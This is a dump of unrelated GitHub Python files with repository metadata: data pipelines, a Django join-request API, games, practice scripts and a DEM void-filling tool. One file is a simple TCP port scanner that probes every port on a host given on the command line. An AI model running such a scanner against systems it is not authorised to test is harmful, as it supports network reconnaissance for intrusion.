plt.ylabel(\"Frequency\")\r\n plt.title('Distribution of diabetic retinopathy in test dataset')\r\n plt.show()\r\n\r\n# change dataset_dir to your own dir\r\ndataset_dir = \"E:\\idrid\\IDRID_dataset\"\r\n# convert 5 classification to 2 classification\r\ntrain_dataset, test_dataset = label_transfer(dataset_dir)\r\n# create tfrecord files\r\ntfrecord(train_dataset, test_dataset, dataset_dir)\r\n# visualized data distribution\r\nEDA(train_dataset)\r\nEDA(test_dataset)\r\n","repo_name":"ruizhecao96/DenseNet121_DR","sub_path":"input_pipeline/data_EDA.py","file_name":"data_EDA.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"32382059429","text":"#! /usr/bin/python3\nimport sys\n \nfor index, line in enumerate(sys.stdin):\n inp = line.split()\n if index == 0:\n numOfMachines = int(inp[0])\n nunOfItems = int(inp[1])\n elif index == 1:\n times = [int(i) for i in inp]\n else:\n time = sum(times) + max(times) * (nunOfItems - 1)\n print(time)\nexit(0)","repo_name":"zackeua/Kattis","sub_path":"sequentialmanufacturing/sequentialmanufacturing.py","file_name":"sequentialmanufacturing.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40911998474","text":"from bisect import bisect_left\r\nimport json\r\nimport time\r\nimport pickle\r\n\r\ndef create_dict_terms_termsid(terms):\r\n ret = {}\r\n i = 1\r\n for term in terms:\r\n ret[term] = i\r\n i += 1\r\n return ret\r\n\r\n\r\ndef parsing(file, terms):\r\n # term_id = create_dict_terms_termsid(terms)\r\n with open(file, 'r') as fd:\r\n data = json.load(fd)\r\n tuples = []\r\n for doc in data:\r\n body = doc['.K'] + doc['.W'] + doc['.T'] # Seul le contenu de .K .W et .T nous intéresse\r\n for word in body.split():\r\n if binary_search(terms, word) != -1: # On vérifie que le mot est bien un terme (il appartient à l'ensemble des terms)\r\n tuples.append((word, doc['.I']))\r\n return tuples\r\n\r\ndef create_posting_list(file, terms):\r\n begin = time.time()\r\n l = parsing(file, terms)\r\n print(\"Creating posting list\")\r\n l.sort()\r\n posting_list = {}\r\n a = {l[0][1]: 1}\r\n posting_list[l[0][0]] = a\r\n for i in range(1, len(l)):\r\n if l[i][0] == l[i - 1][0]:\r\n if l[i][1] == l[i - 1][1]:\r\n a = posting_list[l[i][0]]\r\n a[l[i][1]] += 1\r\n posting_list[l[i][0]] = a\r\n else:\r\n a = posting_list[l[i][0]]\r\n a[l[i][1]] = 1\r\n posting_list[l[i][0]] = a\r\n else:\r\n a = {l[i][1]: 1}\r\n posting_list[l[i][0]] = a\r\n with open('inverted_index', 'wb') as file:\r\n my_pickler = pickle.Pickler(file)\r\n my_pickler.dump(posting_list)\r\n end = time.time()\r\n print(\"Done in {} seconds\".format(end - begin))\r\n\r\ndef binary_search(a, x, lo=0, hi=None): # can't use a to specify default for hi\r\n hi = hi if hi is not None else len(a) # hi defaults to len(a)\r\n pos = bisect_left(a,x,lo,hi) # find insertion position\r\n return (pos if pos != hi and a[pos] == x else -1)\r\n","repo_name":"kasimansour/Search-engine","sub_path":"RI-cacm/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34342219389","text":"import logging\nfrom datetime import datetime\n\nimport redis.exceptions\nfrom django.core.exceptions import PermissionDenied\nfrom django.db import transaction\nfrom django.http import Http404\nfrom django.utils.translation import gettext as _\nfrom drf_spectacular.utils import (\n OpenApiResponse,\n extend_schema,\n extend_schema_view,\n inline_serializer,\n)\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom backend.models import Membership, Site\nfrom backend.models.constants import Role\nfrom backend.models.join_request import JoinRequest, JoinRequestStatus\nfrom backend.serializers import fields\nfrom backend.serializers.join_request_serializers import JoinRequestDetailSerializer\nfrom backend.tasks.send_email_tasks import send_email_task\nfrom backend.views import doc_strings\nfrom backend.views.base_views import FVPermissionViewSetMixin, SiteContentViewSetMixin\nfrom backend.views.utils import get_site_url_from_appjson\n\n\n@extend_schema_view(\n list=extend_schema(\n description=_(\n \"A list of pending join requests associated with the specified site.\"\n ),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_list,\n response=JoinRequestDetailSerializer,\n ),\n 403: OpenApiResponse(description=doc_strings.error_403_site_access_denied),\n 404: OpenApiResponse(description=doc_strings.error_404_missing_site),\n },\n ),\n retrieve=extend_schema(\n description=_(\"Details about a specific join request.\"),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_detail,\n response=JoinRequestDetailSerializer,\n ),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n create=extend_schema(\n description=_(\"Create a join request.\"),\n responses={\n 201: OpenApiResponse(\n description=doc_strings.success_201,\n response=JoinRequestDetailSerializer,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404_missing_site),\n },\n ),\n destroy=extend_schema(\n description=_(\"Delete a join request.\"),\n responses={\n 204: OpenApiResponse(\n description=doc_strings.success_204_deleted,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n approve=extend_schema(\n description=_(\n \"Approve a join request, and create a corresponding site membership.\"\n ),\n request=inline_serializer(\n name=\"Join Request Approval\", fields={\"role\": fields.EnumField(enum=Role)}\n ),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n response=JoinRequestDetailSerializer,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n ignore=extend_schema(\n description=_(\"Ignore a join request.\"),\n request=inline_serializer(name=\"Join Request Ignore\", fields={}),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n reject=extend_schema(\n description=_(\"Reject a join request.\"),\n request=inline_serializer(name=\"Join Request Rejection\", fields={}),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n)\nclass JoinRequestViewSet(\n SiteContentViewSetMixin, FVPermissionViewSetMixin, ModelViewSet\n):\n \"\"\"\n API endpoint for managing join requests.\n \"\"\"\n\n serializer_class = JoinRequestDetailSerializer\n http_method_names = [\"get\", \"post\", \"delete\"]\n\n permission_type_map = {\n \"create\": \"add\",\n \"destroy\": \"delete\",\n \"list\": None,\n \"partial_update\": \"change\",\n \"retrieve\": \"view\",\n \"update\": \"change\",\n \"approve\": \"change\", # custom actions use change permission\n \"ignore\": \"change\",\n \"reject\": \"change\",\n }\n\n def get_queryset(self):\n site = self.get_validated_site()\n return JoinRequest.objects.filter(\n site__slug=site[0].slug, status=JoinRequestStatus.PENDING\n ).select_related(\n \"site\", \"site__language\", \"created_by\", \"last_modified_by\", \"user\"\n )\n\n def get_validated_site(self):\n site_slug = self.get_site_slug()\n site = Site.objects.filter(slug=site_slug)\n\n if len(site) == 0:\n raise Http404\n\n # Check permissions on the site first, skip if the action is create\n if self.action != \"create\":\n perm = Site.get_perm(\"view\")\n if self.request.user.has_perm(perm, site[0]):\n return site\n else:\n raise PermissionDenied\n else:\n return site\n\n @action(detail=True, methods=[\"post\"])\n def ignore(self, request, site_slug=None, pk=None):\n join_request = self.get_object()\n\n self.update_join_request_status(\n join_request, JoinRequestStatus.IGNORED, request.user\n )\n\n serializer = self.get_serializer(join_request)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=True, methods=[\"post\"])\n def reject(self, request, site_slug=None, pk=None):\n join_request = self.get_object()\n\n self.update_join_request_status(\n join_request, JoinRequestStatus.REJECTED, request.user\n )\n\n subject = (\n f\"Update on your request to join {join_request.site.title} on FirstVoices\"\n )\n message = (\n f\"Thank you for requesting to join the {join_request.site.title} site on FirstVoices. \"\n \"A community administrator has reviewed your request. At this time, your request to view private content \"\n \"has not been approved. The site may not be accepting members at this time.\\n\\n\"\n \"Your request may be re-reviewed at a later date.\\n\\n\"\n \"All decisions regarding requests to view private content are made solely by community-based language \"\n \"administrators.\\n\\n\"\n \"If you think this may be a technical error, you can contact FirstVoices staff at \"\n \"hello@firstvoices.com.\\n\\n\"\n )\n\n try:\n send_email_task.apply_async((subject, message, [join_request.user.email]))\n except redis.exceptions.ConnectionError as e:\n logger = logging.getLogger(__name__)\n logger.error(f\"Could not queue task. Error: {e}\")\n\n serializer = self.get_serializer(join_request)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=True, methods=[\"post\"])\n def approve(self, request, site_slug=None, pk=None):\n if \"role\" not in request.data:\n raise ValidationError({\"role\": [\"This field is required.\"]})\n\n try:\n role_value = request.data[\"role\"]\n role = Role[role_value.upper()]\n except KeyError:\n raise ValidationError(\n {\"role\": [\"value must be one of: \" + \", \".join(Role.names)]}\n )\n\n join_request = self.get_object()\n\n has_membership = Membership.objects.filter(\n site=join_request.site, user=join_request.user\n ).first()\n if has_membership:\n raise ValidationError(\"User already has a membership on this site\")\n\n with transaction.atomic():\n Membership.objects.create(\n user=join_request.user, site=join_request.site, role=role\n )\n self.update_join_request_status(\n join_request, JoinRequestStatus.APPROVED, request.user\n )\n\n subject = f\"Welcome to the {join_request.site.title} FirstVoices site!\"\n message = (\n f\"Thank you for requesting to join the {join_request.site.title} site on FirstVoices.\\n\"\n \"A community administrator has approved your request.\\n\\n\"\n f\"You are now approved on the {join_request.site.title} site with the role: {role.label}\\n\"\n \"\"\n )\n base_url = get_site_url_from_appjson(join_request.site)\n if base_url:\n message = (\n message\n + f\"Visit the {join_request.site.title} site here: {base_url}\\n\\n\"\n )\n else:\n message = message + \"\\n\"\n\n try:\n send_email_task.apply_async((subject, message, [join_request.user.email]))\n except redis.exceptions.ConnectionError as e:\n logger = logging.getLogger(__name__)\n logger.error(f\"Could not queue task. Error: {e}\")\n\n serializer = self.get_serializer(join_request)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def update_join_request_status(self, join_request, status, user):\n join_request.status = status\n join_request.last_modified_by = user\n join_request.last_modified = datetime.now()\n join_request.save()\n","repo_name":"First-Peoples-Cultural-Council/fv-be","sub_path":"firstvoices/backend/views/join_request_views.py","file_name":"join_request_views.py","file_ext":"py","file_size_in_byte":10337,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"24962315974","text":"import socket\nimport pyfiglet\nimport sys\nfrom datetime import datetime\n\nascii_banner = pyfiglet.figlet_format(\"PORT SCANNER\")\nprint(ascii_banner)\n\n\nif len(sys.argv) == 2:\n target = socket.gethostbyname(sys.argv[1])\nelse:\n print(\"Invalid amount of arguments!\")\n\nprint(\"\" * 50)\nprint(f\"Scanning target: {target}\")\nprint(f\"Scanning target at: {str(datetime.now())}\")\nprint(\"-\" * 50)\n\ntry:\n for port in range(1, 65535):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socket.setdefaulttimeout(1)\n\n result = s.connect_ex((target, port))\n if result == 0:\n print(f\"Port {port} is open.\")\n s.close()\nexcept KeyboardInterrupt:\n print(\"\\nExiting program.\")\n sys.exit()\nexcept socket.gaierror:\n print(\"\\nHostname could not be resolved.\")\n sys.exit()\nexcept socket.error:\n print(\"\\nServer not responding.\")\n sys.exit()\n","repo_name":"andref50/console-chat","sub_path":"utils/port_scanner.py","file_name":"port_scanner.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"33922375010","text":"import os\n\nfrom loguru import logger\nfrom aio_binance.futures.usdt import Client\nfrom unicorn_binance_rest_api import BinanceRestApiManager\nfrom unicorn_binance_websocket_api import BinanceWebSocketApiManager\n\nBINANCE_API_CLIENT = BinanceRestApiManager(exchange=\"binance.com-futures\")\nAIO_BINANCE_API_CLIENT = Client(show_limit_usage=True)\nBINANCE_WEBSOCKET_MANAGER = BinanceWebSocketApiManager(exchange=\"binance.com-futures\")\nKLINES_DATA = {}\n\nFIRST_KLINE_STREAM_ID = \"\"\nSECOND_KLINE_STREAM_ID = \"\"\n\nlog_folder = \"./logs\"\nos.makedirs(log_folder, exist_ok=True)\n\nlogger.add(f\"{log_folder}/file_{{time:DD-MM}}_{{time:HH-mm}}.log\", rotation=\"100 MB\", retention=\"1 day\",\n encoding='utf-8')\n\n__all__ = [\n 'BINANCE_API_CLIENT', 'BINANCE_WEBSOCKET_MANAGER',\n 'FIRST_KLINE_STREAM_ID', 'SECOND_KLINE_STREAM_ID',\n 'KLINES_DATA', 'AIO_BINANCE_API_CLIENT',\n]","repo_name":"nastiakostenyuk/alert_server_v1","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36751184486","text":"import sys\r\nimport pygame\r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\nfrom time import sleep\r\nimport random\r\n\r\n\r\n# 响应按键函数\r\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = True\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = True\r\n elif event.key == pygame.K_SPACE:\r\n fire_bullets(ai_settings, screen, ship, bullets)\r\n elif event.key == pygame.K_q:\r\n sys.exit() # 快捷退出\r\n\r\n\r\ndef check_keyup_events(event, ship):\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = False\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = False\r\n\r\n\r\ndef check_events(ai_settings, screen, ship, bullets):\r\n for event in pygame.event.get():\r\n # 监听键盘和鼠标事件\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN: # 上下左右移动\r\n check_keydown_events(event, ai_settings, screen, ship, bullets)\r\n elif event.type == pygame.KEYUP:\r\n check_keyup_events(event, ship)\r\n\r\n\r\ndef update_screen(ai_settings, screen, ship, aliens, bullets):\r\n screen.fill(ai_settings.bg_color) # 每次循环时均重新绘制屏幕\r\n for bullet in bullets: # 重新绘制每颗子弹\r\n bullet.draw_bullet()\r\n ship.blitme() # 每次循环时重新绘制飞船\r\n aliens.draw(screen)\r\n pygame.display.flip() # 让绘制屏幕可见\r\n\r\n\r\ndef update_bullets(aliens, bullets):\r\n bullets.update()\r\n # 删除子弹\r\n for bullet in bullets.copy():\r\n if bullet.rect.bottom <= 0:\r\n bullets.remove(bullet)\r\n pygame.sprite.groupcollide(bullets, aliens, True, True)\r\n\r\n\r\ndef fire_bullets(ai_settings, screen, ship, bullets):\r\n # 限制屏幕上最多子弹数量\r\n if len(bullets) < ai_settings.bullets_allowed:\r\n # 创建子弹\r\n new_bullet = Bullet(ai_settings, screen, ship)\r\n bullets.add(new_bullet)\r\n\r\n\r\ndef check_alien_num(ai_settings, screen, ship, aliens, bullets):\r\n if len(aliens) == 0:\r\n # 若外星人均消灭,重新创建外星人\r\n bullets.empty()\r\n create_fleet(ai_settings, screen, ship, aliens)\r\n\r\n\r\ndef create_fleet(ai_settings, screen, ship, aliens):\r\n alien = Alien(ai_settings, screen)\r\n alien_width = alien.rect.width\r\n number_aliens_x = get_number_aliens_x(ai_settings, alien_width)\r\n number_rows = get_number_rows(ai_settings, ship.rect.height, alien.rect.height)\r\n\r\n for row_number in range(number_rows):\r\n for alien_number in range(number_aliens_x):\r\n if random.random() >= 0.5:\r\n create_alien(ai_settings, screen, aliens, alien_number, alien_width, row_number)\r\n\r\n\r\ndef get_number_aliens_x(ai_settings, alien_width):\r\n # 计算一行可以放置外星人的宽度\r\n available_space_x = ai_settings.screen_width - 2 * alien_width\r\n # 计算一行可以放置外星人的个数\r\n number_aliens_x = int(available_space_x / (1.5 * alien_width))\r\n return number_aliens_x\r\n\r\n\r\ndef create_alien(ai_settings, screen, aliens, alien_number, alien_width, row_number):\r\n alien = Alien(ai_settings, screen)\r\n alien.x = alien_width + 1.5 * alien_width * alien_number\r\n alien.rect.x = alien.x\r\n alien.y = alien.rect.height / 2 + 1.5 * alien.rect.height * row_number\r\n alien.rect.y = alien.y\r\n aliens.add(alien)\r\n\r\n\r\n# 计算容纳多少行外星人\r\ndef get_number_rows(ai_settings, ship_height, alien_height):\r\n available_space_y = ai_settings.screen_height - (4.5 * alien_height) - ship_height\r\n number_rows = int(available_space_y / (1.5 * alien_height))\r\n return number_rows\r\n\r\n\r\ndef update_aliens(ai_settings, stats, screen, ship, aliens, bullets):\r\n for alien in aliens.sprites():\r\n alien.y += ai_settings.fleet_drop_speed\r\n alien.rect.y = alien.y\r\n if pygame.sprite.spritecollideany(ship, aliens):\r\n ship_hit(ai_settings, stats, screen, ship, aliens, bullets)\r\n check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets)\r\n check_alien_num(ai_settings, screen, ship, aliens, bullets)\r\n check_fleet_edges(ai_settings, aliens)\r\n aliens.update()\r\n # 对编组update,相当于对每个外星人update\r\n # 检查外星人与飞船的碰撞\r\n\r\n\r\ndef check_fleet_edges(ai_settings, aliens):\r\n for alien in aliens.sprites():\r\n if alien.check_edges():\r\n ai_settings.fleet_direction *= -1\r\n break\r\n\r\n\r\ndef ship_hit(ai_settings, stats, screen, ship, aliens, bullets):\r\n if stats.ship_left > 0:\r\n stats.ship_left -= 1\r\n aliens.empty()\r\n bullets.empty()\r\n # 重建飞船\r\n ship.center_ship()\r\n sleep(0.5)\r\n else:\r\n stats.game_active = False\r\n\r\n\r\ndef check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets):\r\n screen_rect = screen.get_rect()\r\n for alien in aliens.sprites():\r\n if alien.rect.bottom >= screen_rect.bottom:\r\n aliens.remove(alien)\r\n\r\n\r\n\r\n","repo_name":"cuuuute/Alien-Gaming","sub_path":"Alien_Gaming_1107/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":5075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"74038898669","text":"from twisted.internet.endpoints import TCP4ServerEndpoint\nfrom twisted.internet import reactor\nfrom MessageManagers.MessageDispatcher import MessageDispatcherFactory\nfrom MessageManagers.SendMessage import MessageSenderFactory\nfrom CommandMessageGenerators.MessageGenerator import StringMessageGenerator\nfrom CommandMessageGenerators.MessageRepeat import MsgMonitor\nfrom CommandMessageGenerators.ExpMessageGenerator import ReceiveExpNode\nfrom Utilities.Const import *\nfrom Utilities.FileInputTokenize import ArgFIP\nfrom Utilities.FileUtil import expprint, setFileName, OUTFOLDER, getDFilePath, getPFilePath\nimport threading\nimport time\nimport sys\nimport uuid\n\nclass outgoer():\n def __init__(self, ip, port, fact):\n self.ip = ip\n self.port = port\n self.fact = fact\n\n def call(self):\n reactor.connectTCP(self.ip, self.port, self.fact)\n\nclass PlatformManager():\n def __init__(self, in_my_IP, in_my_Port, location):\n self.IP = in_my_IP\n self.Port = in_my_Port\n self.reactorFileConfirmers = []\n self.msgmon = MsgMonitor()\n self.idval = str(uuid.uuid4())\n setFileName(self.idval)\n self.templogfilenames = []\n self.location = location\n\n def ManagerThreadRun(self):\n dbgprint(\"bad way\")\n raise NotImplementedError(\"Abstract method\")\n\n def StartAll(self):\n self.StartServer()\n self.StartManager()\n def StartServer(self):\n #from Utilities.Const import * ##\n self.serverThread = threading.Thread(target=self.ServerThreadRun)\n self.serverThread.start()\n def StartManager(self):\n #from Utilities.Const import * ##\n dbgprint(\"starting mngr\")\n self.managerThread = threading.Thread(target=self.ManagerThreadRun)\n self.managerThread.start()\n\n def SafeStopServer(self):\n dbgprint(\"SafeStopCalled\")\n reactor.callFromThread(reactor.stop)\n self.msgmon.terminate()\n\n def ServerThreadRun(self):\n\n endpoint = TCP4ServerEndpoint(reactor, self.Port)\n endpoint.listen(MessageDispatcherFactory(self))\n dbgprint(\"server starting...\")\n reactor.run(installSignalHandlers=0)\n\n def ReactorReceiverAdd(self, filerec):\n dbgprint(\"added filerec\")\n self.reactorFileConfirmers.append(filerec)\n\n def ReactorFileSent(self, filename, transp):\n dbgprint(\"Reactor File Sent\")\n self.reactorFileConfirmers[:] = [x for x in self.reactorFileConfirmers if x.FileResponded(filename, transp)]\n\n def storeLog(self, vals):\n afilename = str(uuid.uuid4())\n v = vals.replace(\"\\t\", \"\\n\") \n if(afilename in self.templogfilenames):\n expprint(\"BADFILENAME!!\")\n self.templogfilenames.append(afilename)\n with open(afilename, 'w') as afile:\n afile.write(v)\n\n def compilelogs(self):\n expprint(\"Compiling \" + str(len(self.templogfilenames)) + \" logs\\n\")\n for filename in self.templogfilenames:\n if(self.templogfilenames.count(filename) > 1):\n expprint(\"found dup\\n\");\n for filename in self.templogfilenames:\n with open(filename, 'r') as afile:\n for line in afile:\n expprint(line +\"\\n\")\n os.remove(filename)\n dbgprint(\"Logs Compiled To \"+OUTFOLDER+str(self.idval))\n\n def dumpLogToStdOut(self):\n filename = OUTFOLDER+\"/\"+str(self.idval)\n with open(filename, 'r') as afile:\n for line in afile:\n print (line + \"\\n\") ##\n\n def getPFileName(self):\n return getPFilePath()\n\n def getDFileName(self):\n return getDFilePath()\n","repo_name":"Shifat11420/CloudPlatform","sub_path":"Platformv5/Platform/PlatformManager.py","file_name":"PlatformManager.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21112038120","text":"import requests\r\nfrom collections import defaultdict\r\n\r\n# loadData: takes a URL and headers parameters for getting info from the URL endpoint\r\n# parameter URL: this is the endpoint where the data is located in JSON format\r\n# parameter headers: There is no need of headers for accessing this data, so it will be empty\r\ndef loadData(URL,header) :\r\n # making the info request to the endPoint\r\n URLrequest=requests.get(URL,headers=header)\r\n #storing the information to \"result\" variable\r\n result=URLrequest.json()\r\n return result\r\n# takes the input from console of height\r\ndef getInput():\r\n while True:\r\n try :\r\n result = int(input(\"Introduce height in inches adds up to:\"))\r\n break\r\n except ValueError:\r\n print(\"Please introduce a number\")\r\n return result\r\n\r\n# parameters:\r\n# data: Dictionary with players Info\r\n# totalHeight: the total height of the players' pair\r\ndef createHeightDictionary(data, totalHeight):\r\n # create an empty dictionary with heights\r\n dictPairs = defaultdict(list)\r\n # check if\r\n print(type(dictPairs))\r\n for player in data:\r\n try:\r\n # takes playerHeight of each player record and validates data quality\r\n playerHeight = int(player['h_in'])\r\n except ValueError:\r\n print(\"Height is not an integer value on player:\" + player['first_name'] + \" \" + player['last_name'])\r\n\r\n # add player to the dictionary\r\n dictPairs[playerHeight].append(player['first_name'] + \" \" + player['last_name'])\r\n # print(dictPairs)\r\n\r\n return dictPairs\r\n# program starting point\r\ntotalHeight = getInput()\r\n \r\n# url hardcoded\r\nurl='https://mach-eight.uc.r.appspot.com'\r\n# load data into result (as a dcitionary) variable from url\r\nDataresult=loadData(url,{})\r\nprint(type(Dataresult))\r\nfor data in Dataresult['values'] :\r\n print(data)\t\t\r\n\r\nplayersHeight = createHeightDictionary(Dataresult['values'],totalHeight)\r\nprint(playersHeight)\r\n# search pairs depends on each heigh against another player\r\nprint(\"The pairs of basketball players that added up:[\"+ str(totalHeight)+\"] inches are:\")\r\nfor height in playersHeight:\r\n # print(height)\r\n if totalHeight - height in playersHeight:\r\n for otherPlayer in playersHeight[totalHeight - height] :\r\n for player in playersHeight[height]:\r\n #print(\"player:\"+player)\r\n if player < otherPlayer:\r\n print(\"[\"+player + \" - \" + otherPlayer+\"]\")\r\n ","repo_name":"jriosfer/Playerspairs","sub_path":"getPairs.py","file_name":"getPairs.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33882337144","text":"from aiogram.types import BotCommand\n\nBOT_COMMAND_LIST = (\n (\"start\", \"Запустить бота\"),\n (\"suggest\", \"Предложить пароль\"),\n (\"logout\", \"Выйти\"),\n (\"help\", \"Помощь\"),\n (\"about\", \"О боте\"),\n)\n\nBOT_COMMANDS = [\n BotCommand(command=name, description=desc) for name, desc in BOT_COMMAND_LIST\n]\n\nBOT_COMMANDS_STR = \"\\n\".join(\"/\" + (\" - \".join(cmd)) for cmd in BOT_COMMAND_LIST)\n","repo_name":"everysoftware/secrets","sub_path":"bot/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"40316526464","text":"#딕셔너리 선언\nd={'과목1':'자료구조','과목2':'컴논개'}\n\n#삽입\nd['과목3']='데이터구조'\nd['과목4']='컴개실'\nprint(d)\n\n#ADT 활용 예시\nGet=d.get('과목1')\nShow=d.values()\nKeysList=list(d.keys())\nValuesList=list(d.values())\nTuple_d=d.items()\nprint(f' Get={Get} \\n Show={Show} \\n KeysList={KeysList} \\n ValuesList={ValuesList} \\n Tuple_d={Tuple_d}')\n\nprint()\n#집합 선언\ns={0,1,2}\n\ns.add(4)\ns.update([10,6])\ns.remove(0)\nlength=len(s)\n\nt={0,1,2,20}\nUnion=s.union(t)\nIntersection=s.intersection(t)\nDifference=s.difference(t)\n\nprint(f'집합 : {s} \\nUnion : {Union} \\nIntersection : {Intersection} \\nDifference : {Difference}')\n\n\n#comprehension\na = []\nfor x in range(31):\n if x % 3 ==0:\n a.append(x)\n\n#a=[x for in range(31) if x%3==0]\n\n\ndef add(*args):\n sum=0\n for x in args:\n sum+=x\n return sum\nprint(add(3,4,5,6))\n\n\ndef say_myself(name, old, man=True):\n print(\"나의 이름은 %s 입니다\" %name)\n print(\"나이는 %d 살 입니다.\" %old)\n if man:\n print(\"남자입니다.\")\n else:\n print(\"여자입니다.\")\n\n\ndef increase1(x):\n x +=1\n\nx=10\nincrease1(x)\nprint(x)\n\ns=[]\ns.append(3)\ns.extend('4')\ns.extend({5:6, 7:8})\nprint(s)\n\naa=s.copy()\nprint(aa,\"\\n\")\nstring= \"hello world\"\ntu=(1,2,3,4)\nprint(max(string))\nprint(max(tu))","repo_name":"Againyunn/Python-Study","sub_path":"DataStructure/수업내용/PythonReview/자료형 연습.py","file_name":"자료형 연습.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15277613728","text":"#!/usr/bin/env python\n\n# inst: university of bristol\n# auth: jeison sosa\n# mail: j.sosa@bristol.ac.uk / sosa.jeison@gmail.com\n\nfrom sys import exit\nimport subprocess\nimport numpy as np\nimport gdalutils as gu\n\nos = 'osx'\nvoid_demf = 'lidar_england_50m.tif'\nfill_demf = 'OS_terrain_50.tif'\nnodata = -9999 # non data value in both datasets\n\n# Calculate delta surface with voids\ndef step_01():\n\n geo = gu.get_geo(void_demf)\n void_dem = gu.get_data(void_demf)\n fill_dem = gu.get_data(fill_demf)\n delta_surf = void_dem - fill_dem\n\n delta_surf[(delta_surf>=8000) | (delta_surf<=-8000)] = nodata\n delta_surf[delta_surf==0] = nodata\n\n gu.write_raster(delta_surf,'delta_surf_wt_voids.tif',geo,'Float64',nodata)\n\n# Create list of source points to interpolate\ndef step_02():\n\n subprocess.call(['gdal_translate','-of','XYZ','delta_surf_wt_voids.tif','delta_surf_wt_voids.xyz'])\n subprocess.call(['sed','s/ /,/g','delta_surf_wt_voids.xyz'],stdout=open('delta_surf_wt_voids.csv','w'))\n if os == 'osx':\n subprocess.call(['sed','-i','','/-9999/d','delta_surf_wt_voids.csv'])\n elif os == 'linux':\n subprocess.call(['sed','-i','/-9999/d','delta_surf_wt_voids.csv'])\n else:\n print('OS not identified')\n exit(0)\n\n f = open('delta_surf_wt_voids.vrt','w')\n f.write(''+'\\n')\n f.write(' '+'\\n')\n f.write(' delta_surf_wt_voids.csv'+'\\n')\n f.write(' wkbPoint'+'\\n')\n f.write(' '+'\\n')\n f.write(' '+'\\n')\n f.write(''+'\\n')\n f.close()\n\n# Interpolation\ndef step_03():\n\n geo = gu.get_geo(void_demf)\n nx = geo[4]\n ny = geo[5]\n xmin = geo[0]\n xmax = geo[2]\n ymin = geo[1]\n ymax = geo[3]\n\n subprocess.call(['gdal_grid','--config','GDAL_NUM_THREADS','ALL_CPUS',\n '-a','invdist',\n '-of','GTiff',\n '-ot','Float64',\n '-txe', str(xmin), str(xmax),\n '-tye', str(ymin), str(ymax),\n '-outsize', str(nx), str(ny),\n '-l','delta_surf_wt_voids',\n 'delta_surf_wt_voids.vrt','delta_surf_interp.tif'])\n\n# Get final raster\ndef step_04():\n\n A = gu.get_data('delta_surf_interp.tif')\n B = gu.get_data(fill_demf)\n C = gu.get_data(void_demf)\n geo = gu.get_geo(void_demf)\n mysum = A+B\n final = np.where(C==nodata,mysum,C)\n \n final[(final>=8000) | (final<=-8000)] = nodata\n gu.write_raster(final,'dem.tif',geo,'Float64',nodata)\n\n# Running the program\ndef main():\n step_01()\n step_02()\n step_03()\n 